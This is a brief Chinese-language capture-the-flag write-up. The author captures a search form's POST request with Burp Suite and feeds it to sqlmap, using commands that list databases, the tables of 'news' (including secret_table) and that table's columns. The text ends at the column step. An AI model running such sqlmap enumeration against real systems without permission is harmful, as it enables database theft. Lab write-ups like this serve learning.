burp suite抓包,sqlmap注入
打开链接
有一个搜索框,随意输入写数字,没有变化,用bp抓包试一下,也没有发现,看了看大佬的wp,才知道考sql注入。。。。
看了下是post,所以然后保存在桌面,123.txt
然后用sqlmap注入(这方面我也不太会。。。)
1,查找数据库 -r C:\Users\123\Desktop\123.txt --dbs 发现有两个数据库
推测应该是news
2,查找news下的表 -r C:\Users\123\Desktop\123.txt --tables -D news
看见一个secret_table
3,查找字段 -r C:\Users\123\Desktop\123.txt --column -D news -T secret_table